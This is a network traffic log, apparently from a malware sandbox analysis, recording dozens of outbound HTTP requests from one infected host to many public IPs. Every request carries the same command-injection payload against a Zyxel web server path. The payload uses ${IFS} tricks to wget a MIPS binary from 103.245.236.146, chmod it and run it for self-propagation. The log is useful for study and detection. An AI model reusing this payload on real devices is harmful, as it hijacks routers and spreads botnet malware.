                                      Jan 19, 2024 17:29:30.727811098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3854192.168.2.1438604208.126.241.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727852106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3855192.168.2.143817024.239.105.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727899075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3856192.168.2.1443902134.142.200.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727929115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3857192.168.2.145303277.196.143.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727962017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3858192.168.2.1457978170.91.174.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728014946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3859192.168.2.145580414.126.109.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728045940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3860192.168.2.144705218.58.238.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728097916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3861192.168.2.1438670149.80.120.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728127956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3862192.168.2.1432792199.37.51.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728147030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3863192.168.2.143532286.89.188.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728188038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3864192.168.2.1447154149.229.126.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728236914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3865192.168.2.144648071.209.97.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728271961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3866192.168.2.144786245.25.110.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728317976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3867192.168.2.1435588207.89.155.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728344917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3868192.168.2.1459160189.69.198.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728382111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3869192.168.2.145034267.42.15.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728432894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3870192.168.2.146093693.108.31.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728466988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3871192.168.2.1452822171.93.196.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728517056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3872192.168.2.144516225.109.50.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728563070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3873192.168.2.145513846.230.242.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728599072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3874192.168.2.1451748137.248.151.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728616953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3875192.168.2.1442998130.206.181.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728669882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3876192.168.2.143571478.6.23.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728710890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3877192.168.2.1458226169.34.28.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728763103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3878192.168.2.145648824.139.211.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728804111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3879192.168.2.144638484.243.8.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728827953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3880192.168.2.144481019.53.39.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728916883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3881192.168.2.144400899.138.60.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.728956938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3882192.168.2.1435384145.99.182.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729005098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3883192.168.2.143963289.153.73.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729024887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3884192.168.2.1451574131.44.59.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729089975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3885192.168.2.145568238.250.89.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729141951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3886192.168.2.1447664110.42.19.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729183912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3887192.168.2.144141647.238.209.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729213953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3888192.168.2.1434348188.246.125.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729274035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3889192.168.2.1458348211.135.113.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729331017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3890192.168.2.144587891.247.14.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729362011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3891192.168.2.1443394185.71.41.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729387999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3892192.168.2.145853265.17.170.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729439020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3893192.168.2.14374324.98.34.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729489088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3894192.168.2.1450904150.40.209.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729510069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3895192.168.2.144806084.126.78.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729538918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3896192.168.2.1449168206.106.84.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729574919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3897192.168.2.1445252138.69.93.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729603052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3898192.168.2.144276834.4.161.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729628086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3899192.168.2.143991878.153.15.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729687929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3900192.168.2.145964014.61.87.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729707003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3901192.168.2.144521891.204.186.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729767084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3902192.168.2.1441026169.66.10.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729787111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3903192.168.2.1450300209.228.251.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729826927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3904192.168.2.145320842.174.122.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729882956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3905192.168.2.143609813.134.172.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729924917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3906192.168.2.143597276.18.150.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.729973078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3907192.168.2.1445542212.71.231.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730014086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3908192.168.2.144381452.254.250.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730038881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3909192.168.2.144249446.46.123.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730094910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3910192.168.2.1442792142.108.107.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730144024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3911192.168.2.1458002138.203.85.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730190039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3912192.168.2.145086880.20.176.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730228901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3913192.168.2.145064850.219.166.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730262995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3914192.168.2.144712886.215.108.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730293036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3915192.168.2.1442126138.54.125.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730319977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3916192.168.2.1449656104.167.192.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.730364084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3917192.168.2.1442276183.212.16.51443
                                      TimestampBytes transferredDirectionData
